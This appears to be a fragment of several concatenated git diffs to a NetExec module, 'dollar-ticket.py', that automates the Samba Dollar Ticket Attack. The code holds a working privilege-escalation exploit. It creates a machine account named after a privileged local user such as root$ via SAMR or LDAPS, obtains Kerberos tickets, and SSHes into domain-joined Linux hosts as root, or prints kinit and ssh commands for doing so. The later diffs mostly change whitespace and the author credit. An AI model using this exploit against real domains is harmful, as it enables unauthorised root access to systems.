-            sys.exit(1)
-
     def on_login(self, context, connection):
-        """Main execution flow"""
+        """Create machine account, obtain TGT and Service Ticket"""
+        if not hasattr(self, "ssh_target"):
+            return
+
         self.context = context
         self.connection = connection
 
-        context.log.info(f"Starting Dollar Ticket Attack targeting local user '{self.target_user}'")
-        context.log.info(f"Machine account to create: {self.computer_name_full}")
-
-        # Step 1: Create machine account
-        success = self._create_machine_account()
-        if not success:
+        # Step 1: Create machine account via add-computer
+        if not self._create_machine_account():
             return
 
-        # Step 2: Attempt SSH exploitation if target specified
-        if self.ssh_target:
-            self._exploit_via_ssh()
-        else:
-            self._provide_manual_steps()
+        # Step 2: Generate TGT + Service Ticket
+        if not self._generate_tickets():
+            return
+
+        # Step 3: Display exploitation instructions
+        self._show_exploitation_steps()
 
     def _create_machine_account(self):
-        """Create machine account via SAMR or LDAPS"""
-        self.context.log.info(f"Creating machine account via {self.method}...")
-
-        if self.method == "SAMR" and self.connection.args.protocol == "smb":
-            return self._create_via_samr()
-        elif self.method == "LDAPS" and self.connection.args.protocol == "ldap":
-            return self._create_via_ldap()
-        else:
-            self.context.log.error(f"Cannot use {self.method} with {self.connection.args.protocol} protocol")
-            self.context.log.error("Use: SAMR with SMB, or LDAPS with LDAP")
-            return False
-
-    def _create_via_samr(self):
-        """Create machine account via SAMR (SMB)"""
+        """Create machine account using add-computer module"""
         try:
-            conn = self.connection
-            rpc_transport = transport.SMBTransport(
-                conn.conn.getRemoteHost(),
-                445,
-                r"\samr",
-                smb_connection=conn.conn
-            )
-
-            dce = rpc_transport.get_dce_rpc()
-            dce.connect()
-            dce.bind(samr.MSRPC_UUID_SAMR)
-
-            # Open domain
-            serv_handle = samr.hSamrConnect5(
-                dce,
-                f"\\\\{conn.conn.getRemoteName()}\x00",
-                samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN
-            )["ServerHandle"]
-
-            domains = samr.hSamrEnumerateDomainsInSamServer(dce, serv_handle)["Buffer"]["Buffer"]
-            non_builtin = [d for d in domains if d["Name"].lower() != "builtin"]
-
-            if len(non_builtin) > 1:
-                matched = [d for d in domains if d["Name"].lower() == self.connection.domain.lower()]
-                selected = matched[0]["Name"] if matched else non_builtin[0]["Name"]
-            else:
-                selected = non_builtin[0]["Name"]
-
-            domain_sid = samr.hSamrLookupDomainInSamServer(dce, serv_handle, selected)["DomainId"]
-            domain_handle = samr.hSamrOpenDomain(
-                dce,
-                serv_handle,
-                samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER,
-                domain_sid
-            )["DomainHandle"]
-
-            # Create computer account
-            try:
-                request = samr.SamrCreateUser2InDomain()
-                request["DomainHandle"] = domain_handle
-                request["Name"] = self.computer_name_full
-                request["AccountType"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
-                request["DesiredAccess"] = samr.USER_FORCE_PASSWORD_CHANGE
-                user_handle = dce.request(request)["UserHandle"]
-
-                # Set password
-                samr.hSamrSetPasswordInternal4New(dce, user_handle, self.password)
-
-                # Set workstation trust account flag
-                user_rid = samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.computer_name_full])["RelativeIds"]["Element"][0]
-                samr.hSamrCloseHandle(dce, user_handle)
-                user_handle = samr.hSamrOpenUser(dce, domain_handle, samr.MAXIMUM_ALLOWED, user_rid)["UserHandle"]
-
-                req = samr.SAMPR_USER_INFO_BUFFER()
-                req["tag"] = samr.USER_INFORMATION_CLASS.UserControlInformation
-                req["Control"]["UserAccountControl"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
-                samr.hSamrSetInformationUser2(dce, user_handle, req)
-
-                samr.hSamrCloseHandle(dce, user_handle)
-                samr.hSamrCloseHandle(dce, domain_handle)
-                samr.hSamrCloseHandle(dce, serv_handle)
-
-                self.context.log.success(f"Created machine account: {self.computer_name_full}")
-                self.context.log.success(f"Password: {self.password}")
-                return True
-
-            except samr.DCERPCSessionError as e:
-                if "STATUS_USER_EXISTS" in str(e):
-                    self.context.log.error(f"Machine account '{self.computer_name_full}' already exists")
-                elif "STATUS_ACCESS_DENIED" in str(e):
-                    self.context.log.error("Access denied. Insufficient privileges.")
-                elif "STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED" in str(e):
-                    self.context.log.error("Machine account quota exceeded (MachineAccountQuota)")
-                else:
-                    self.context.log.error(f"Error creating machine account: {e}")
-                return False
-
+            add_computer_module = importlib.import_module("nxc.modules.add-computer")
+            add_computer = add_computer_module.NXCModule()
         except Exception as e:
-            self.context.log.error(f"SAMR operation failed: {e}")
+            self.context.log.error(f"Failed to import add-computer module: {e}")
             return False
-        finally:
-            with contextlib.suppress(Exception):
-                dce.disconnect()
 
-    def _create_via_ldap(self):
-        """Create machine account via LDAPS"""
+        add_computer_options = {
+            "NAME": self.computer_name,
+            "PASSWORD": self.password
+        }
+
         try:
-            ldap_conn = self.connection.ldap_connection
-            name = self.computer_name
-            computer_dn = f"CN={name},CN=Computers,{self.connection.baseDN}"
-            fqdn = f"{name}.{self.connection.domain}"
-
-            spns = [
-                f"HOST/{name}",
-                f"HOST/{fqdn}",
-                f"RestrictedKrbHost/{name}",
-                f"RestrictedKrbHost/{fqdn}",
-            ]
-
-            ldap_conn.add(
-                computer_dn,
-                ["top", "person", "organizationalPerson", "user", "computer"],
-                {
-                    "dnsHostName": fqdn,
-                    "userAccountControl": 0x1000,  # WORKSTATION_TRUST_ACCOUNT
-                    "servicePrincipalName": spns,
-                    "sAMAccountName": self.computer_name_full,
-                    "unicodePwd": f'"{self.password}"'.encode("utf-16-le"),
-                },
-            )
-
-            self.context.log.success(f"Created machine account: {self.computer_name_full}")
-            self.context.log.success(f"Password: {self.password}")
+            add_computer.options(self.context, add_computer_options)
+            add_computer.on_login(self.context, self.connection)
             return True
-
-        except LDAPSessionError as e:
-            if "entryAlreadyExists" in str(e):
-                self.context.log.error(f"Machine account '{self.computer_name_full}' already exists")
-            elif "insufficientAccessRights" in str(e):
-                self.context.log.error("Insufficient rights to create machine account")
-            elif "constraintViolation" in str(e):
-                self.context.log.error("Constraint violation (quota exceeded or password policy)")
-            else:
-                self.context.log.error(f"LDAP error: {e}")
+        except SystemExit:
+            self.context.log.error("Failed to create machine account")
+            return False
+        except Exception as e:
+            self.context.log.error(f"Error creating machine account: {e}")
             return False
 
-    def _exploit_via_ssh(self):
-        """Automated exploitation via SSH with Kerberos"""
-        self.context.log.info(f"Attempting Kerberos authentication to {self.ssh_target}...")
+    def _generate_tickets(self):
+        """Generate TGT and Service Ticket for SSH host"""
+        self.context.log.info(f"Obtaining TGT for {self.target_user}@{self.connection.domain.upper()}")
 
-        # Check if kinit/klist are available
-        if not self._check_kerberos_tools():
-            self.context.log.error("Kerberos tools (kinit/klist) not found. Install krb5-user package.")
-            self._provide_manual_steps()
-            return
+        # Step 1: Request TGT for 'root' (without $)
+        # KDC will fallback to 'root$' machine account
+        userName = Principal(self.target_user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
 
         try:
-            # Obtain TGT for the machine account principal (without $)
-            # KDC will find root$ when root is requested
-            self.context.log.info(f"Requesting TGT for principal '{self.target_user}'...")
-
-            # Create temporary krb5.conf with the domain
-            krb5_conf = self._create_krb5_conf()
-
-            env = os.environ.copy()
-            env["KRB5_CONFIG"] = krb5_conf
-
-            # Use echo to pipe password to kinit
-            kinit_cmd = f"echo '{self.password}' | kinit {self.target_user}@{self.connection.domain.upper()}"
-            result = subprocess.run(
-                kinit_cmd,
-                shell=True,
-                env=env,
-                capture_output=True,
-                text=True,
-                timeout=10
+            tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(
+                clientName=userName,
+                password=self.password,
+                domain=self.connection.domain.upper(),
+                lmhash=b"",
+                nthash=b"",
+                aesKey="",
+                kdcHost=self.connection.host
             )
 
-            if result.returncode != 0:
-                self.context.log.error(f"kinit failed: {result.stderr}")
-                self._provide_manual_steps()
-                return
+            self.context.log.success(f"TGT obtained (KDC fallback: {self.computer_name_full})")
+            self.context.log.debug(f"Cipher: {cipher}")
 
-            self.context.log.success("TGT obtained successfully")
-
-            # Verify ticket
-            klist_result = subprocess.run(
-                ["klist"],
-                env=env,
-                capture_output=True,
-                text=True
-            )
-
-            if self.target_user in klist_result.stdout or self.computer_name_full in klist_result.stdout:
-                self.context.log.info("Ticket cache contents:")
-                for line in klist_result.stdout.split("\n")[:5]:
-                    if line.strip():
-                        self.context.log.info(f"  {line}")
-
-            # Attempt SSH with GSSAPI
-            self.context.log.info(f"Attempting SSH to {self.ssh_target} as '{self.target_user}'...")
-
-            ssh_cmd = [
-                "ssh",
-                "-o", "PreferredAuthentications=gssapi-with-mic",
-                "-o", "GSSAPIAuthentication=yes",
-                "-o", "StrictHostKeyChecking=no",
-                "-o", "UserKnownHostsFile=/dev/null",
-                "-l", self.target_user,
-                self.ssh_target,
-                "id"
-            ]
-
-            ssh_result = subprocess.run(
-                ssh_cmd,
-                env=env,
-                capture_output=True,
-                text=True,
-                timeout=15
-            )
-
-            if ssh_result.returncode == 0:
-                self.context.log.success("PRIVILEGE ESCALATION SUCCESSFUL!")
-                self.context.log.success(f"Authenticated as '{self.target_user}' on {self.ssh_target}")
-                self.context.log.success(f"Output: {ssh_result.stdout.strip()}")
-                self.context.log.info("")
-                self.context.log.info("Cleanup (when done):")
-                self.context.log.info(f"  nxc smb {self.connection.host} -u {self.connection.username} -p <password> \\")
-                self.context.log.info(f"      -M add-computer -o NAME={self.computer_name} DELETE=True")
-            else:
-                self.context.log.error(f"SSH authentication failed: {ssh_result.stderr}")
-                self.context.log.error("Possible reasons:")
-                self.context.log.error("  - PAC validation is enabled on target")
-                self.context.log.error("  - PermitRootLogin is disabled")
-                self.context.log.error("  - GSSAPI authentication is disabled")
-                self._provide_manual_steps()
-
-            # Cleanup Kerberos ticket
-            subprocess.run(["kdestroy"], env=env, capture_output=True)
-
-            # Remove temporary krb5.conf
-            with contextlib.suppress(Exception):
-                os.unlink(krb5_conf)
-
-        except subprocess.TimeoutExpired:
-            self.context.log.error("Operation timed out")
-            self._provide_manual_steps()
         except Exception as e:
-            self.context.log.error(f"Exploitation failed: {e}")
-            self._provide_manual_steps()
+            self.context.log.fail(f"Failed to obtain TGT: {e}")
+            return False
 
-    def _provide_manual_steps(self):
-        """Provide manual exploitation steps"""
+        ssh_target_fqdn = self.ssh_target
+        if "." not in self.ssh_target:
+            ssh_target_fqdn = f"{self.ssh_target}.{self.connection.domain}"
+
+        self.context.log.info(f"Requesting Service Ticket for host/{ssh_target_fqdn}")
+
+        try:
+            serverName = Principal(
+                f"host/{ssh_target_fqdn}",
+                type=constants.PrincipalNameType.NT_SRV_INST.value
+            )
+            tgs, cipher_st, oldSessionKey_st, sessionKey_st = getKerberosTGS(
+                serverName=serverName,
+                domain=self.connection.domain.upper(),
+                kdcHost=self.connection.host,
+                tgt=tgt,
+                cipher=cipher,
+                sessionKey=sessionKey
+            )
+            self.context.log.success(f"Service Ticket obtained for host/{ssh_target_fqdn}")
+
+        except Exception as e:
+            self.context.log.fail(f"Failed to obtain Service Ticket: {e}")
+            self.context.log.info("TGT obtained but ST failed - you can manually request ST with kinit")
+            tgs = None
+
+        try:
+            ccache = CCache()
+            ccache.fromTGT(tgt, oldSessionKey, sessionKey)
+            if tgs:
+                ccache.fromTGS(tgs, oldSessionKey_st, sessionKey_st)
+
+            tgt_file = f"{self.tgt_path.removesuffix('.ccache')}.ccache"
+            ccache.saveFile(tgt_file)
+
+            self.context.log.success(f"Tickets saved to: {tgt_file}")
+            self.tgt_file = tgt_file
+            return True
+        except Exception as e:
+            self.context.log.fail(f"Failed to save tickets: {e}")
+            return False
+
+    def _show_exploitation_steps(self):
+        """Display Dollar Ticket Attack exploitation instructions"""
         self.context.log.info("\n" + "=" * 70)
-        self.context.log.info("EXPLOITATION STEPS")
+        self.context.log.info("DOLLAR TICKET ATTACK - READY FOR EXPLOITATION")
         self.context.log.info("=" * 70)
-        self.context.log.info(f"Machine account created: {self.computer_name_full}")
-        self.context.log.info(f"Password: {self.password}")
-        self.context.log.info(f"Domain: {self.connection.domain.upper()}")
+        self.context.log.info(f"Machine account: {self.computer_name_full}")
+        self.context.log.info(f"Tickets saved: {self.tgt_file}")
         self.context.log.info("")
-        self.context.log.info("1. Obtain Kerberos ticket:")
-        self.context.log.info(f"   kinit {self.target_user}@{self.connection.domain.upper()}")
-        self.context.log.info(f"   # Password: {self.password}")
+        self.context.log.info(f"Attack: Requested ticket for '{self.target_user}' (no $)")
+        self.context.log.info(f"        KDC fallback issued ticket for '{self.computer_name_full}'")
+        self.context.log.info(f"        SSH maps '{self.computer_name_full}' -> '{self.target_user}'")
         self.context.log.info("")
-        self.context.log.info("2. Authenticate to target Linux/Unix host:")
-        if self.ssh_target:
-            self.context.log.info(f"   ssh -o PreferredAuthentications=gssapi-with-mic -l {self.target_user} {self.ssh_target}")
-        else:
-            self.context.log.info(f"   ssh -o PreferredAuthentications=gssapi-with-mic -l {self.target_user} <target_ip>")
+        self.context.log.info("Authenticate to Linux/Unix target:")
+        self.context.log.info(f"   export KRB5CCNAME={self.tgt_file}")
+        self.context.log.info(f"   ssh -o PreferredAuthentications=gssapi-with-mic -l {self.target_user} {self.ssh_target}")
         self.context.log.info("")
-        self.context.log.info("3. Verify privilege escalation:")
-        self.context.log.info("   id")
-        self.context.log.info("   whoami")
+        self.context.log.info("Verify privilege escalation:")
+        self.context.log.info("   id && whoami")
         self.context.log.info("")
-        self.context.log.info(f"Note: KDC issues ticket for '{self.computer_name_full}' when '{self.target_user}' is requested")
-        self.context.log.info(f"      MIT Kerberos on target maps '{self.computer_name_full}' -> '{self.target_user}'")
-        self.context.log.info("")
-        self.context.log.info("CLEANUP (when done):")
-        self.context.log.info(f"  nxc smb {self.connection.host} -u {self.connection.username} -p <password> \\")
+        self.context.log.info("Cleanup:")
+        self.context.log.info(f"  nxc {self.connection.args.protocol} {self.connection.host} -u {self.connection.username} -p <password> \\")
         self.context.log.info(f"      -M add-computer -o NAME={self.computer_name} DELETE=True")
         self.context.log.info("=" * 70 + "\n")
-
-    def _check_kerberos_tools(self):
-        """Check if kinit and klist are available"""
-        try:
-            subprocess.run(["kinit", "--version"], capture_output=True, timeout=5)
-            subprocess.run(["klist", "--version"], capture_output=True, timeout=5)
-            return True
-        except (FileNotFoundError, subprocess.TimeoutExpired):
-            return False
-
-    def _create_krb5_conf(self):
-        """Create temporary krb5.conf for the domain"""
-        krb5_content = f"""[libdefaults]
-    default_realm = {self.connection.domain.upper()}
-    dns_lookup_realm = true
-    dns_lookup_kdc = true
-
-[realms]
-    {self.connection.domain.upper()} = {{
-        kdc = {self.connection.host}
-        admin_server = {self.connection.host}
-    }}
-
-[domain_realm]
-    .{self.connection.domain.lower()} = {self.connection.domain.upper()}
-    {self.connection.domain.lower()} = {self.connection.domain.upper()}
-"""
-
-        with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".conf") as f:
-            f.write(krb5_content)
-            return f.name
 
     @staticmethod
     def _generate_password():
@@ -412,7 +208,6 @@ class NXCModule:
         chars = string.ascii_letters + string.digits + "!@#$%^&*"
         password = "".join(random.choice(chars) for _ in range(16))
 
-        # Ensure complexity
         if not any(c.isupper() for c in password):
             password = password[0].upper() + password[1:]
         if not any(c.islower() for c in password):

--- a/nxc/modules/dollar-ticket.py
+++ b/nxc/modules/dollar-ticket.py
@@ -2,59 +2,59 @@
 """
 Dollar Ticket Attack Module for NetExec
 Automates privilege escalation on Linux/Unix domain-joined systems
-
+ 
 Author: @bl4ckarch
 Based on: https://wiki.samba.org/index.php/Security/Dollar_Ticket_Attack
 CVEs: CVE-2020-25717, CVE-2020-25719, CVE-2021-42287
 """
-
+ 
 import contextlib
 import os
 import subprocess
 import sys
 import tempfile
-
+ 
 from impacket.dcerpc.v5 import samr, transport
 from impacket.ldap.ldap import LDAPSessionError
 from nxc.helpers.misc import CATEGORY
-
-
+ 
+ 
 class NXCModule:
     """
     Exploits the Dollar Ticket Attack against Linux/Unix domain-joined targets
-
+ 
     Creates a machine account with a privileged username (e.g., root$), then optionally
     attempts to authenticate to the target via SSH using Kerberos GSSAPI. MIT Kerberos
     services strip the trailing '$' from machine accounts, allowing privilege escalation.
     """
-
+ 
     name = "dollar-ticket"
-    description = "Exploits Dollar Ticket Attack for privilege escalation on Linux/Unix targets credits to @bl4ckarch"
+    description = "Exploits Dollar Ticket Attack for privilege escalation on Linux/Unix targets"
     supported_protocols = ["smb", "ldap"]
     category = CATEGORY.PRIVILEGE_ESCALATION
     multiple_hosts = False
-
+ 
     def options(self, context, module_options):
         r"""
         Dollar Ticket Attack options:
-
+ 
         TARGET_USER     Local privileged user to impersonate (default: root)
         PASSWORD        Password for the machine account (default: random)
         METHOD          Creation method: SAMR or LDAPS (default: SAMR)
         SSH_TARGET      Target SSH host for automated exploitation (optional)
-
+ 
         Usage examples:
             # Create machine account and get exploitation steps
             nxc smb $DC_IP -u Username -p Password -M dollar-ticket -o TARGET_USER=root
-
+ 
             # With automated SSH exploitation
             nxc smb $DC_IP -u Username -p Password -M dollar-ticket \
                 -o TARGET_USER=root SSH_TARGET=192.168.1.50
-
+ 
             # Use LDAPS method
             nxc ldap $DC_IP -u Username -p Password -M dollar-ticket \
                 -o TARGET_USER=ubuntu METHOD=LDAPS SSH_TARGET=192.168.1.50
-
+ 
         Cleanup (when done):
             nxc smb $DC_IP -u Username -p Password -M add-computer \
                 -o NAME=root DELETE=True
@@ -63,41 +63,41 @@ class NXCModule:
         self.password = module_options.get("PASSWORD", self._generate_password())
         self.method = module_options.get("METHOD", "SAMR").upper()
         self.ssh_target = module_options.get("SSH_TARGET", None)
-
+ 
         # Machine account name (without trailing $, added automatically)
         self.computer_name = self.target_user
         if self.computer_name.endswith("$"):
             self.computer_name = self.computer_name[:-1]
-
+ 
         self.computer_name_full = f"{self.computer_name}$"
-
+ 
         if self.method not in ["SAMR", "LDAPS"]:
             context.log.error("METHOD must be either SAMR or LDAPS")
             sys.exit(1)
-
+ 
     def on_login(self, context, connection):
         """Main execution flow"""
         self.context = context
         self.connection = connection
-
+ 
         context.log.info(f"Starting Dollar Ticket Attack targeting local user '{self.target_user}'")
         context.log.info(f"Machine account to create: {self.computer_name_full}")
-
+ 
         # Step 1: Create machine account
         success = self._create_machine_account()
         if not success:
             return
-
+ 
         # Step 2: Attempt SSH exploitation if target specified
         if self.ssh_target:
             self._exploit_via_ssh()
         else:
             self._provide_manual_steps()
-
+ 
     def _create_machine_account(self):
         """Create machine account via SAMR or LDAPS"""
         self.context.log.info(f"Creating machine account via {self.method}...")
-
+ 
         if self.method == "SAMR" and self.connection.args.protocol == "smb":
             return self._create_via_samr()
         elif self.method == "LDAPS" and self.connection.args.protocol == "ldap":
@@ -106,7 +106,7 @@ class NXCModule:
             self.context.log.error(f"Cannot use {self.method} with {self.connection.args.protocol} protocol")
             self.context.log.error("Use: SAMR with SMB, or LDAPS with LDAP")
             return False
-
+ 
     def _create_via_samr(self):
         """Create machine account via SAMR (SMB)"""
         try:
@@ -117,27 +117,27 @@ class NXCModule:
                 r"\samr",
                 smb_connection=conn.conn
             )
-
+ 
             dce = rpc_transport.get_dce_rpc()
             dce.connect()
             dce.bind(samr.MSRPC_UUID_SAMR)
-
+ 
             # Open domain
             serv_handle = samr.hSamrConnect5(
                 dce,
                 f"\\\\{conn.conn.getRemoteName()}\x00",
                 samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN
             )["ServerHandle"]
-
+ 
             domains = samr.hSamrEnumerateDomainsInSamServer(dce, serv_handle)["Buffer"]["Buffer"]
             non_builtin = [d for d in domains if d["Name"].lower() != "builtin"]
-
+ 
             if len(non_builtin) > 1:
                 matched = [d for d in domains if d["Name"].lower() == self.connection.domain.lower()]
                 selected = matched[0]["Name"] if matched else non_builtin[0]["Name"]
             else:
                 selected = non_builtin[0]["Name"]
-
+ 
             domain_sid = samr.hSamrLookupDomainInSamServer(dce, serv_handle, selected)["DomainId"]
             domain_handle = samr.hSamrOpenDomain(
                 dce,
@@ -145,7 +145,7 @@ class NXCModule:
                 samr.DOMAIN_LOOKUP | samr.DOMAIN_CREATE_USER,
                 domain_sid
             )["DomainHandle"]
-
+ 
             # Create computer account
             try:
                 request = samr.SamrCreateUser2InDomain()
@@ -154,28 +154,28 @@ class NXCModule:
                 request["AccountType"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
                 request["DesiredAccess"] = samr.USER_FORCE_PASSWORD_CHANGE
                 user_handle = dce.request(request)["UserHandle"]
-
+ 
                 # Set password
                 samr.hSamrSetPasswordInternal4New(dce, user_handle, self.password)
-
+ 
                 # Set workstation trust account flag
                 user_rid = samr.hSamrLookupNamesInDomain(dce, domain_handle, [self.computer_name_full])["RelativeIds"]["Element"][0]
                 samr.hSamrCloseHandle(dce, user_handle)
                 user_handle = samr.hSamrOpenUser(dce, domain_handle, samr.MAXIMUM_ALLOWED, user_rid)["UserHandle"]
-
+ 
                 req = samr.SAMPR_USER_INFO_BUFFER()
                 req["tag"] = samr.USER_INFORMATION_CLASS.UserControlInformation
                 req["Control"]["UserAccountControl"] = samr.USER_WORKSTATION_TRUST_ACCOUNT
                 samr.hSamrSetInformationUser2(dce, user_handle, req)
-
+ 
                 samr.hSamrCloseHandle(dce, user_handle)
                 samr.hSamrCloseHandle(dce, domain_handle)
                 samr.hSamrCloseHandle(dce, serv_handle)
-
+ 
                 self.context.log.success(f"Created machine account: {self.computer_name_full}")
                 self.context.log.success(f"Password: {self.password}")
                 return True
-
+ 
             except samr.DCERPCSessionError as e:
                 if "STATUS_USER_EXISTS" in str(e):
                     self.context.log.error(f"Machine account '{self.computer_name_full}' already exists")
@@ -186,14 +186,14 @@ class NXCModule:
                 else:
                     self.context.log.error(f"Error creating machine account: {e}")
                 return False
-
+ 
         except Exception as e:
             self.context.log.error(f"SAMR operation failed: {e}")
             return False
         finally:
             with contextlib.suppress(Exception):
                 dce.disconnect()
-
+ 
     def _create_via_ldap(self):
         """Create machine account via LDAPS"""
         try:
@@ -201,14 +201,14 @@ class NXCModule:
             name = self.computer_name
             computer_dn = f"CN={name},CN=Computers,{self.connection.baseDN}"
             fqdn = f"{name}.{self.connection.domain}"
-
+ 
             spns = [
                 f"HOST/{name}",
                 f"HOST/{fqdn}",
                 f"RestrictedKrbHost/{name}",
                 f"RestrictedKrbHost/{fqdn}",
             ]
-
+ 
             ldap_conn.add(
                 computer_dn,
                 ["top", "person", "organizationalPerson", "user", "computer"],
@@ -220,11 +220,11 @@ class NXCModule:
                     "unicodePwd": f'"{self.password}"'.encode("utf-16-le"),
                 },
             )
-
+ 
             self.context.log.success(f"Created machine account: {self.computer_name_full}")
             self.context.log.success(f"Password: {self.password}")
             return True
-
+ 
         except LDAPSessionError as e:
             if "entryAlreadyExists" in str(e):
                 self.context.log.error(f"Machine account '{self.computer_name_full}' already exists")
@@ -235,28 +235,28 @@ class NXCModule:
             else:
                 self.context.log.error(f"LDAP error: {e}")
             return False
-
+ 
     def _exploit_via_ssh(self):
         """Automated exploitation via SSH with Kerberos"""
         self.context.log.info(f"Attempting Kerberos authentication to {self.ssh_target}...")
-
+ 
         # Check if kinit/klist are available
         if not self._check_kerberos_tools():
             self.context.log.error("Kerberos tools (kinit/klist) not found. Install krb5-user package.")
             self._provide_manual_steps()
             return
-
+ 
         try:
             # Obtain TGT for the machine account principal (without $)
             # KDC will find root$ when root is requested
             self.context.log.info(f"Requesting TGT for principal '{self.target_user}'...")
-
+ 
             # Create temporary krb5.conf with the domain
             krb5_conf = self._create_krb5_conf()
-
+ 
             env = os.environ.copy()
             env["KRB5_CONFIG"] = krb5_conf
-
+ 
             # Use echo to pipe password to kinit
             kinit_cmd = f"echo '{self.password}' | kinit {self.target_user}@{self.connection.domain.upper()}"
             result = subprocess.run(
@@ -267,14 +267,14 @@ class NXCModule:
                 text=True,
                 timeout=10
             )
-
+ 
             if result.returncode != 0:
                 self.context.log.error(f"kinit failed: {result.stderr}")
                 self._provide_manual_steps()
                 return
-
+ 
             self.context.log.success("TGT obtained successfully")
-
+ 
             # Verify ticket
             klist_result = subprocess.run(
                 ["klist"],
@@ -282,16 +282,16 @@ class NXCModule:
                 capture_output=True,
                 text=True
             )
-
+ 
             if self.target_user in klist_result.stdout or self.computer_name_full in klist_result.stdout:
                 self.context.log.info("Ticket cache contents:")
                 for line in klist_result.stdout.split("\n")[:5]:
                     if line.strip():
                         self.context.log.info(f"  {line}")
-
+ 
             # Attempt SSH with GSSAPI
             self.context.log.info(f"Attempting SSH to {self.ssh_target} as '{self.target_user}'...")
-
+ 
             ssh_cmd = [
                 "ssh",
                 "-o", "PreferredAuthentications=gssapi-with-mic",
@@ -302,7 +302,7 @@ class NXCModule:
                 self.ssh_target,
                 "id"
             ]
-
+ 
             ssh_result = subprocess.run(
                 ssh_cmd,
                 env=env,
@@ -310,7 +310,7 @@ class NXCModule:
                 text=True,
                 timeout=15
             )
-
+ 
             if ssh_result.returncode == 0:
                 self.context.log.success("PRIVILEGE ESCALATION SUCCESSFUL!")
                 self.context.log.success(f"Authenticated as '{self.target_user}' on {self.ssh_target}")
@@ -326,21 +326,21 @@ class NXCModule:
                 self.context.log.error("  - PermitRootLogin is disabled")
                 self.context.log.error("  - GSSAPI authentication is disabled")
                 self._provide_manual_steps()
-
+ 
             # Cleanup Kerberos ticket
             subprocess.run(["kdestroy"], env=env, capture_output=True)
-
+ 
             # Remove temporary krb5.conf
             with contextlib.suppress(Exception):
                 os.unlink(krb5_conf)
-
+ 
         except subprocess.TimeoutExpired:
             self.context.log.error("Operation timed out")
             self._provide_manual_steps()
         except Exception as e:
             self.context.log.error(f"Exploitation failed: {e}")
             self._provide_manual_steps()
-
+ 
     def _provide_manual_steps(self):
         """Provide manual exploitation steps"""
         self.context.log.info("\n" + "=" * 70)
@@ -371,7 +371,7 @@ class NXCModule:
         self.context.log.info(f"  nxc smb {self.connection.host} -u {self.connection.username} -p <password> \\")
         self.context.log.info(f"      -M add-computer -o NAME={self.computer_name} DELETE=True")
         self.context.log.info("=" * 70 + "\n")
-
+ 
     def _check_kerberos_tools(self):
         """Check if kinit and klist are available"""
         try:
@@ -380,38 +380,38 @@ class NXCModule:
             return True
         except (FileNotFoundError, subprocess.TimeoutExpired):
             return False
-
+ 
     def _create_krb5_conf(self):
         """Create temporary krb5.conf for the domain"""
         krb5_content = f"""[libdefaults]
     default_realm = {self.connection.domain.upper()}
     dns_lookup_realm = true
     dns_lookup_kdc = true
-
+ 
 [realms]
     {self.connection.domain.upper()} = {{
         kdc = {self.connection.host}
         admin_server = {self.connection.host}
     }}
-
+ 
 [domain_realm]
     .{self.connection.domain.lower()} = {self.connection.domain.upper()}
     {self.connection.domain.lower()} = {self.connection.domain.upper()}
 """
-
+ 
         with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".conf") as f:
             f.write(krb5_content)
             return f.name
-
+ 
     @staticmethod
     def _generate_password():
         """Generate a random complex password"""
         import random
         import string
-
+ 
         chars = string.ascii_letters + string.digits + "!@#$%^&*"
         password = "".join(random.choice(chars) for _ in range(16))
-
+ 
         # Ensure complexity
         if not any(c.isupper() for c in password):
             password = password[0].upper() + password[1:]
@@ -421,6 +421,8 @@ class NXCModule:
             password = password[:-1] + "1"
         if not any(c in "!@#$%^&*" for c in password):
             password = password[:-1] + "!"
-
+ 
         return password
-        
+ 
+ 
+ 

--- a/nxc/modules/dollar-ticket.py
+++ b/nxc/modules/dollar-ticket.py
@@ -2,59 +2,59 @@
 """
 Dollar Ticket Attack Module for NetExec
 Automates privilege escalation on Linux/Unix domain-joined systems
- 
+
 Author: @bl4ckarch
 Based on: https://wiki.samba.org/index.php/Security/Dollar_Ticket_Attack
 CVEs: CVE-2020-25717, CVE-2020-25719, CVE-2021-42287
 """
- 
+
 import contextlib
 import os
 import subprocess
 import sys
 import tempfile
- 
+
 from impacket.dcerpc.v5 import samr, transport
 from impacket.ldap.ldap import LDAPSessionError
 from nxc.helpers.misc import CATEGORY
- 
- 
+
+
 class NXCModule:
     """
     Exploits the Dollar Ticket Attack against Linux/Unix domain-joined targets
- 
+
     Creates a machine account with a privileged username (e.g., root$), then optionally
     attempts to authenticate to the target via SSH using Kerberos GSSAPI. MIT Kerberos
     services strip the trailing '$' from machine accounts, allowing privilege escalation.
     """
- 
+
     name = "dollar-ticket"
-    description = "Exploits Dollar Ticket Attack for privilege escalation on Linux/Unix targets"
+    description = "Exploits Dollar Ticket Attack for privilege escalation on Linux/Unix targets credits to @bl4ckarch"
     supported_protocols = ["smb", "ldap"]
     category = CATEGORY.PRIVILEGE_ESCALATION
     multiple_hosts = False
- 
+
     def options(self, context, module_options):
         r"""
         Dollar Ticket Attack options:
- 
+
         TARGET_USER     Local privileged user to impersonate (default: root)
         PASSWORD        Password for the machine account (default: random)
         METHOD          Creation method: SAMR or LDAPS (default: SAMR)
         SSH_TARGET      Target SSH host for automated exploitation (optional)
- 
+
         Usage examples:
             # Create machine account and get exploitation steps
             nxc smb $DC_IP -u Username -p Password -M dollar-ticket -o TARGET_USER=root
- 
+
             # With automated SSH exploitation
             nxc smb $DC_IP -u Username -p Password -M dollar-ticket \
                 -o TARGET_USER=root SSH_TARGET=192.168.1.50
- 
+
             # Use LDAPS method
             nxc ldap $DC_IP -u Username -p Password -M dollar-ticket \
                 -o TARGET_USER=ubuntu METHOD=LDAPS SSH_TARGET=192.168.1.50
- 
+
         Cleanup (when done):
             nxc smb $DC_IP -u Username -p Password -M add-computer \
                 -o NAME=root DELETE=True
@@ -63,41 +63,41 @@ class NXCModule:
         self.password = module_options.get("PASSWORD", self._generate_password())
         self.method = module_options.get("METHOD", "SAMR").upper()
